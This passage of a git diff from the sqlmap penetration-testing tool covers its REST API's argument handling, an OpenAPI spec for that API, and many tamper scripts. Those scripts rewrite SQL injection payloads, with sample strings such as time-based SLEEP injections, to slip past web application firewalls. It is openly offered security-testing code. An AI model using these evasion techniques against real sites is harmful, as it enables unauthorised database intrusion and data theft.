RESTAPI_DEFAULT_ADAPTER, default=RESTAPI_DEFAULT_ADAPTER) + apiparser.add_argument("--database", help="Set IPC database filepath (optional)") + apiparser.add_argument("--username", help="Basic authentication username (optional)") + apiparser.add_argument("--password", help="Basic authentication password (optional)") + (args, _) = apiparser.parse_known_args() if hasattr(apiparser, "parse_known_args") else apiparser.parse_args() # Start the client or the server - if args.server is True: - server(args.host, args.port) - elif args.client is True: - client(args.host, args.port) + if args.server: + server(args.host, args.port, adapter=args.adapter, username=args.username, password=args.password, database=args.database) + elif args.client: + client(args.host, args.port, username=args.username, password=args.password) + else: + apiparser.print_help() + +if __name__ == "__main__": + main() diff --git a/sqlmapapi.yaml b/sqlmapapi.yaml new file mode 100644 index 00000000000..16641c24d8d --- /dev/null +++ b/sqlmapapi.yaml @@ -0,0 +1,297 @@ +openapi: 3.0.1 +info: + title: sqlmapapi OpenAPI/Swagger specification + version: '0.1' +paths: + /version: + get: + description: Fetch server version + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + version: + type: string + example: "1.5.7.7#dev" + success: + type: boolean + example: true + /task/new: + get: + description: Create a new task + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + taskid: + type: string + example: "fad44d6beef72285" + success: + type: boolean + example: true + /task/{taskid}/delete: + get: + description: Delete an existing task + parameters: + - in: path + name: taskid + required: true + schema: + type: string + description: Scan task ID + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + success: + type: boolean + example: true + /option/{taskid}/list: + get: + description: List options for a given task ID + parameters: + - in: path + name: taskid + required: true + schema: + type: string + description: Scan task ID + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + success: + type: boolean + example: true + options: + type: array + items: + type: object + /option/{taskid}/get: + post: + description: Get value of option(s) for a certain task ID + parameters: + - in: path + name: taskid + required: true + schema: + type: string + requestBody: + content: + application/json: + schema: + type: array + items: + type: string + example: ["url", "cookie"] + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + success: + type: boolean + options: + type: object + /option/{taskid}/set: + post: + description: Set value of option(s) for a certain task ID + parameters: + - in: path + name: taskid + required: true + schema: + type: string + requestBody: + content: + application/json: + schema: + type: object + example: {"cookie": "id=1"} + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + success: + type: boolean + /scan/{taskid}/start: + post: + description: Launch a scan + parameters: + - in: path + name: taskid + required: true + schema: + type: string + description: Scan task ID + requestBody: + content: + application/json: + schema: + type: object + properties: + url: + type: string + examples: + '0': + value: '{"url":"http://testphp.vulnweb.com/artists.php?artist=1"}' + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + engineid: + type: integer + example: 19720 + success: + type: boolean + example: true + /scan/{taskid}/stop: + get: + description: Stop a scan + parameters: + - in: path + name: taskid + required: true + schema: + type: string + description: Scan task ID + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + success: + type: boolean + example: true + /scan/{taskid}/status: + get: + description: Fetch status of a scan + parameters: + - in: path + name: taskid + required: true + schema: + type: string + description: Scan task ID + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + status: + type: string + example: terminated + returncode: + type: integer + example: 0 + success: + type: boolean + example: true + /scan/{taskid}/data: + get: + description: Retrieve the scan resulting data + parameters: + - in: path + name: taskid + required: true + schema: + type: string + description: Scan task ID + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + data: + type: array + items: + type: object + success: + type: boolean + example: true + error: + type: array + items: + type: object + /scan/{taskid}/log: + get: + description: Retrieve the log messages + parameters: + - in: path + name: taskid + required: true + schema: + type: string + description: Scan task ID + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + log: + type: array + items: + type: object + success: + type: boolean + example: true + /scan/{taskid}/kill: + get: + description: Kill a scan + parameters: + - in: path + name: taskid + required: true + schema: + type: string + description: Scan task ID + responses: + '200': + description: OK + content: + application/json: + schema: + type: object + properties: + success: + type: boolean + example: true diff --git a/tamper/0eunion.py b/tamper/0eunion.py new file mode 100644 index 00000000000..5a52c92fa06 --- /dev/null +++ b/tamper/0eunion.py @@ -0,0 +1,32 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Replaces an integer followed by UNION with an integer followed by e0UNION + + Requirement: + * MySQL + * MsSQL + + Notes: + * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf + + >>> tamper('1 UNION ALL SELECT') + '1e0UNION ALL SELECT' + """ + + return re.sub(r"(?i)(\d+)\s+(UNION )", r"\g<1>e0\g<2>", payload) if payload else payload diff --git a/tamper/__init__.py b/tamper/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/tamper/__init__.py +++ b/tamper/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/tamper/apostrophemask.py b/tamper/apostrophemask.py index 27389b5760a..9562002a131 100644 --- a/tamper/apostrophemask.py +++ b/tamper/apostrophemask.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import PRIORITY @@ -14,17 +14,16 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces apostrophe character with its UTF-8 full width counterpart - - Example: - * Input: AND '1'='1' - * Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87 + Replaces single quotes (') with their UTF-8 full-width equivalents (e.g. ' -> %EF%BC%87) References: * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 - * http://lukasz.pilorz.net/testy/unicode_conversion/ - * http://sla.ckers.org/forum/read.php?13,11562,11850 - * http://lukasz.pilorz.net/testy/full_width_utf/index.phps + * https://web.archive.org/web/20130614183121/http://lukasz.pilorz.net/testy/unicode_conversion/ + * https://web.archive.org/web/20131121094431/sla.ckers.org/forum/read.php?13,11562,11850 + * https://web.archive.org/web/20070624194958/http://lukasz.pilorz.net/testy/full_width_utf/index.phps + + >>> tamper("1 AND '1'='1") + '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' """ return payload.replace('\'', "%EF%BC%87") if payload else payload diff --git a/tamper/apostrophenullencode.py b/tamper/apostrophenullencode.py index 6d2c10937f9..0cbafe30cd6 100644 --- a/tamper/apostrophenullencode.py +++ b/tamper/apostrophenullencode.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.enums import PRIORITY @@ -14,11 +14,10 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces apostrophe character with its illegal double unicode counterpart + Replaces single quotes (') with an illegal double Unicode encoding (e.g. ' -> %00%27) - Example: - * Input: AND '1'='1' - * Output: AND %00%271%00%27=%00%271%00%27 + >>> tamper("1 AND '1'='1") + '1 AND %00%271%00%27=%00%271' """ return payload.replace('\'', "%00%27") if payload else payload diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py index 5dfee8c79a5..92a5fb3ef5c 100644 --- a/tamper/appendnullbyte.py +++ b/tamper/appendnullbyte.py @@ -1,24 +1,24 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import os + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOWEST def dependencies(): - pass + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.ACCESS)) def tamper(payload, **kwargs): """ - Appends encoded NULL byte character at the end of payload - - Example: - * Input: AND 1=1 - * Output: AND 1=1%00 + Appends an (Access) NULL byte character (%00) at the end of payload Requirement: * Microsoft Access @@ -29,6 +29,9 @@ def tamper(payload, **kwargs): also possible Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection + + >>> tamper('1 AND 1=1') + '1 AND 1=1%00' """ return "%s%%00" % payload if payload else payload diff --git a/tamper/base64encode.py b/tamper/base64encode.py index 2f9832dcca4..b5de4e74970 100644 --- a/tamper/base64encode.py +++ b/tamper/base64encode.py @@ -1,26 +1,24 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import base64 - +from lib.core.convert import encodeBase64 from lib.core.enums import PRIORITY -__priority__ = PRIORITY.LOWEST +__priority__ = PRIORITY.LOW def dependencies(): pass def tamper(payload, **kwargs): """ - Base64 all characters in a given payload + Encodes the entire payload using Base64 - Example: - * Input: 1' AND SLEEP(5)# - * Output: MScgQU5EIFNMRUVQKDUpIw== + >>> tamper("1' AND SLEEP(5)#") + 'MScgQU5EIFNMRUVQKDUpIw==' """ - return base64.b64encode(payload) if payload else payload + return encodeBase64(payload, binary=False) if payload else payload diff --git a/tamper/between.py b/tamper/between.py index 136fbadf30c..8e9538088f0 100644 --- a/tamper/between.py +++ b/tamper/between.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re @@ -16,11 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' - - Example: - * Input: 'A > B' - * Output: 'A NOT BETWEEN 0 AND B' + Replaces the greater-than operator (>) with NOT BETWEEN 0 AND # and the equal sign (=) with BETWEEN # AND # Tested against: * Microsoft SQL Server 2005 @@ -33,34 +29,31 @@ def tamper(payload, **kwargs): filter the greater than character * The BETWEEN clause is SQL standard. Hence, this tamper script should work against all (?) databases + + >>> tamper('1 AND A > B--') + '1 AND A NOT BETWEEN 0 AND B--' + >>> tamper('1 AND A = B--') + '1 AND A BETWEEN B AND B--' + >>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()') + '1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()' """ retVal = payload if payload: - retVal = "" - quote, doublequote, firstspace = False, False, False - - for i in xrange(len(payload)): - if not firstspace: - if payload[i].isspace(): - firstspace = True - retVal += " " - continue - - elif payload[i] == '\'': - quote = not quote - - elif payload[i] == '"': - doublequote = not doublequote + match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload) - elif payload[i] == ">" and not doublequote and not quote: - retVal += " " if i > 0 and not payload[i - 1].isspace() else "" - retVal += "NOT BETWEEN %s AND" % ('0' if re.search(r"\A[^\w]*\d", payload[i + 1:]) else "NULL") - retVal += " " if i < len(payload) - 1 and not payload[i + 1:i + 2].isspace() else "" + if match: + _ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5)) + retVal = retVal.replace(match.group(0), _) + else: + retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", r" NOT BETWEEN 0 AND \g<1>", payload) - continue + if retVal == payload: + match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*([\w()]+)\s*", payload) - retVal += payload[i] + if match: + _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5)) + retVal = retVal.replace(match.group(0), _) return retVal diff --git a/tamper/binary.py b/tamper/binary.py new file mode 100644 index 00000000000..0259b2911da --- /dev/null +++ b/tamper/binary.py @@ -0,0 +1,43 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Injects the keyword binary where applicable + + Requirement: + * MySQL + + >>> tamper('1 UNION ALL SELECT NULL, NULL, NULL') + '1 UNION ALL SELECT binary NULL, binary NULL, binary NULL' + >>> tamper('1 AND 2>1') + '1 AND binary 2>binary 1' + >>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END') + 'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END' + """ + + retVal = payload + + if payload: + retVal = re.sub(r"\bNULL\b", "binary NULL", retVal) + retVal = re.sub(r"\b(THEN\s+)(\d+|0x[0-9a-f]+)(\s+ELSE\s+)(\d+|0x[0-9a-f]+)", r"\g<1>binary \g<2>\g<3>binary \g<4>", retVal) + retVal = re.sub(r"(\d+\s*[>=]\s*)(\d+)", r"binary \g<1>binary \g<2>", retVal) + retVal = re.sub(r"\b((AND|OR)\s*)(\d+)", r"\g<1>binary \g<3>", retVal) + retVal = re.sub(r"([>=]\s*)(\d+)", r"\g<1>binary \g<2>", retVal) + retVal = re.sub(r"\b(0x[0-9a-f]+)", r"binary \g<1>", retVal) + retVal = re.sub(r"(\s+binary)+", r"\g<1>", retVal) + + return retVal diff --git a/tamper/bluecoat.py b/tamper/bluecoat.py index c5ba2ee39a8..3ca4b8d4a3c 100644 --- a/tamper/bluecoat.py +++ b/tamper/bluecoat.py @@ -1,12 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re +from lib.core.data import kb from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL @@ -16,12 +17,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces space character after SQL statement with a valid random blank character. - Afterwards replace character = with LIKE operator - - Example: - * Input: SELECT id FROM users where id = 1 - * Output: SELECT%09id FROM users where id LIKE 1 + Replaces the space following an SQL statement with a random valid blank character, then converts = to LIKE Requirement: * Blue Coat SGOS with WAF activated as documented in @@ -32,12 +28,23 @@ def tamper(payload, **kwargs): Notes: * Useful to bypass Blue Coat's recommended WAF rule configuration + + >>> tamper('SELECT id FROM users WHERE id = 1') + 'SELECT%09id FROM%09users WHERE%09id LIKE 1' """ + def process(match): + word = match.group('word') + if word.upper() in kb.keywords: + return match.group().replace(word, "%s%%09" % word) + else: + return match.group() + retVal = payload if payload: - retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>\t", payload) + retVal = re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]|\Z)", process, retVal) retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) + retVal = retVal.replace("%09 ", "%09") return retVal diff --git a/tamper/chardoubleencode.py b/tamper/chardoubleencode.py index 30a749c065f..4213421cb72 100644 --- a/tamper/chardoubleencode.py +++ b/tamper/chardoubleencode.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import string @@ -16,17 +16,13 @@ def dependencies(): def tamper(payload, **kwargs): """ - Double url-encodes all characters in a given payload (not processing - already encoded) - - Example: - * Input: SELECT FIELD FROM%20TABLE - * Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545 + Double URL-encodes each character in the payload (ignores already encoded ones) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554) Notes: - * Useful to bypass some weak web application firewalls that do not - double url-decode the request before processing it through their - ruleset + * Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset + + >>> tamper('SELECT FIELD FROM%20TABLE') + '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' """ retVal = payload @@ -37,7 +33,7 @@ def tamper(payload, **kwargs): while i < len(payload): if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: - retVal += payload[i:i + 3] + retVal += '%%25%s' % payload[i + 1:i + 3] i += 3 else: retVal += '%%25%.2X' % ord(payload[i]) diff --git a/tamper/charencode.py b/tamper/charencode.py index ff93d174d92..980406aa12b 100644 --- a/tamper/charencode.py +++ b/tamper/charencode.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import string @@ -16,12 +16,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Url-encodes all characters in a given payload (not processing already - encoded) - - Example: - * Input: SELECT FIELD FROM%20TABLE - * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45 + URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) Tested against: * Microsoft SQL Server 2005 @@ -30,10 +25,11 @@ def tamper(payload, **kwargs): * PostgreSQL 8.3, 8.4, 9.0 Notes: - * Useful to bypass very weak web application firewalls that do not - url-decode the request before processing it through their ruleset - * The web server will anyway pass the url-decoded version behind, - hence it should work against any DBMS + * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset + * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS + + >>> tamper('SELECT FIELD FROM%20TABLE') + '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' """ retVal = payload diff --git a/tamper/charunicodeencode.py b/tamper/charunicodeencode.py index c509aec37ee..3772b0b24dd 100644 --- a/tamper/charunicodeencode.py +++ b/tamper/charunicodeencode.py @@ -1,15 +1,15 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os import string -from lib.core.enums import PRIORITY from lib.core.common import singleTimeWarnMessage +from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOWEST @@ -18,12 +18,7 @@ def dependencies(): def tamper(payload, **kwargs): """ - Unicode-url-encodes non-encoded characters in a given payload (not - processing already encoded) - - Example: - * Input: SELECT FIELD%20FROM TABLE - * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045' + Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) Requirement: * ASP @@ -36,9 +31,10 @@ def tamper(payload, **kwargs): * PostgreSQL 9.0.3 Notes: - * Useful to bypass weak web application firewalls that do not - unicode url-decode the request before processing it through their - ruleset + * Useful to bypass weak web application firewalls that do not unicode URL-decode the request before processing it through their ruleset + + >>> tamper('SELECT FIELD%20FROM TABLE') + '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' """ retVal = payload diff --git a/tamper/charunicodeescape.py b/tamper/charunicodeescape.py new file mode 100644 index 00000000000..80b600f9ca0 --- /dev/null +++ b/tamper/charunicodeescape.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import string + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def tamper(payload, **kwargs): + """ + Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) + + Notes: + * Useful to bypass weak filtering and/or WAFs in JSON contexes + + >>> tamper('SELECT FIELD FROM TABLE') + '\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045' + """ + + retVal = payload + + if payload: + retVal = "" + i = 0 + + while i < len(payload): + if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: + retVal += "\\u00%s" % payload[i + 1:i + 3] + i += 3 + else: + retVal += '\\u%.4X' % ord(payload[i]) + i += 1 + + return retVal diff --git a/tamper/commalesslimit.py b/tamper/commalesslimit.py new file mode 100644 index 00000000000..6361a7563ba --- /dev/null +++ b/tamper/commalesslimit.py @@ -0,0 +1,40 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import re + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGH + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) + +def tamper(payload, **kwargs): + """ + Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart + + Requirement: + * MySQL + + Tested against: + * MySQL 5.0 and 5.5 + + >>> tamper('LIMIT 2, 3') + 'LIMIT 3 OFFSET 2' + """ + + retVal = payload + + match = re.search(r"(?i)LIMIT\s*(\d+),\s*(\d+)", payload or "") + if match: + retVal = retVal.replace(match.group(0), "LIMIT %s OFFSET %s" % (match.group(2), match.group(1))) + + return retVal diff --git a/tamper/commalessmid.py b/tamper/commalessmid.py new file mode 100644 index 00000000000..6743ddc0876 --- /dev/null +++ b/tamper/commalessmid.py @@ -0,0 +1,44 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import re + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGH + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) + +def tamper(payload, **kwargs): + """ + Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart + + Requirement: + * MySQL + + Tested against: + * MySQL 5.0 and 5.5 + + >>> tamper('MID(VERSION(), 1, 1)') + 'MID(VERSION() FROM 1 FOR 1)' + """ + + retVal = payload + + warnMsg = "you should consider usage of switch '--no-cast' along with " + warnMsg += "tamper script '%s'" % os.path.basename(__file__).split(".")[0] + singleTimeWarnMessage(warnMsg) + + match = re.search(r"(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)", payload or "") + if match: + retVal = retVal.replace(match.group(0), "MID(%s FROM %s FOR %s)" % (match.group(1), match.group(2), match.group(3))) + + return retVal diff --git a/tamper/commentbeforeparentheses.py b/tamper/commentbeforeparentheses.py new file mode 100644 index 00000000000..a3fbf33b507 --- /dev/null +++ b/tamper/commentbeforeparentheses.py @@ -0,0 +1,40 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.NORMAL + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + Prepends (inline) comment before parentheses (e.g. ( -> /**/() + + Tested against: + * Microsoft SQL Server + * MySQL + * Oracle + * PostgreSQL + + Notes: + * Useful to bypass web application firewalls that block usage + of function calls + + >>> tamper('SELECT ABS(1)') + 'SELECT ABS/**/(1)' + """ + + retVal = payload + + if payload: + retVal = re.sub(r"\b(\w+)\(", r"\g<1>/**/(", retVal) + + return retVal diff --git a/tamper/concat2concatws.py b/tamper/concat2concatws.py new file mode 100644 index 00000000000..1aeca3098e2 --- /dev/null +++ b/tamper/concat2concatws.py @@ -0,0 +1,40 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) + +def tamper(payload, **kwargs): + """ + Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart + + Requirement: + * MySQL + + Tested against: + * MySQL 5.0 + + Notes: + * Useful to bypass very weak and bespoke web application firewalls + that filter the CONCAT() function + + >>> tamper('CONCAT(1,2)') + 'CONCAT_WS(MID(CHAR(0),0,0),1,2)' + """ + + if payload: + payload = payload.replace("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),") + + return payload diff --git a/tamper/decentities.py b/tamper/decentities.py new file mode 100644 index 00000000000..7ecb32cf4d3 --- /dev/null +++ b/tamper/decentities.py @@ -0,0 +1,33 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOW + +def dependencies(): + pass + +def tamper(payload, **kwargs): + """ + HTML encode in decimal (using code points) all characters (e.g. ' -> ') + + >>> tamper("1' AND SLEEP(5)#") + '1' AND SLEEP(5)#' + """ + + retVal = payload + + if payload: + retVal = "" + i = 0 + + while i < len(payload): + retVal += "&#%s;" % ord(payload[i]) + i += 1 + + return retVal diff --git a/tamper/dunion.py b/tamper/dunion.py new file mode 100644 index 00000000000..db2cd94375d --- /dev/null +++ b/tamper/dunion.py @@ -0,0 +1,34 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import os +import re + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.HIGHEST + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.ORACLE)) + +def tamper(payload, **kwargs): + """ + Replaces instances of <int> UNION with <int>DUNION + + Requirement: + * Oracle + + Notes: + * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf + + >>> tamper('1 UNION ALL SELECT') + '1DUNION ALL SELECT' + """ + + return re.sub(r"(?i)(\d+)\s+(UNION )", r"\g<1>D\g<2>", payload) if payload else payload diff --git a/tamper/equaltolike.py b/tamper/equaltolike.py index 52a80e7b720..9552dcb7a7d 100644 --- a/tamper/equaltolike.py +++ b/tamper/equaltolike.py @@ -1,29 +1,22 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import os import re -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): - singleTimeWarnMessage("tamper script '%s' is unlikely to work against %s" % (os.path.basename(__file__).split(".")[0], DBMS.PGSQL)) + pass def tamper(payload, **kwargs): """ - Replaces all occurances of operator equal ('=') with operator 'LIKE' - - Example: - * Input: SELECT * FROM users WHERE id=1 - * Output: SELECT * FROM users WHERE id LIKE 1 + Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart Tested against: * Microsoft SQL Server 2005 @@ -34,17 +27,14 @@ def tamper(payload, **kwargs): filter the equal character ('=') * The LIKE operator is SQL standard. Hence, this tamper script should work against all (?) databases - """ - def process(match): - word = match.group() - word = "%sLIKE%s" % (" " if word[0] != " " else "", " " if word[-1] != " " else "") - - return word + >>> tamper('SELECT * FROM users WHERE id=1') + 'SELECT * FROM users WHERE id LIKE 1' + """ retVal = payload if payload: - retVal = re.sub(r"\s*=\s*", lambda match: process(match), retVal) + retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) return retVal diff --git a/tamper/equaltorlike.py b/tamper/equaltorlike.py new file mode 100644 index 00000000000..0bad97d1fdc --- /dev/null +++ b/tamper/equaltorlike.py @@ -0,0 +1,37 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import PRIORITY + 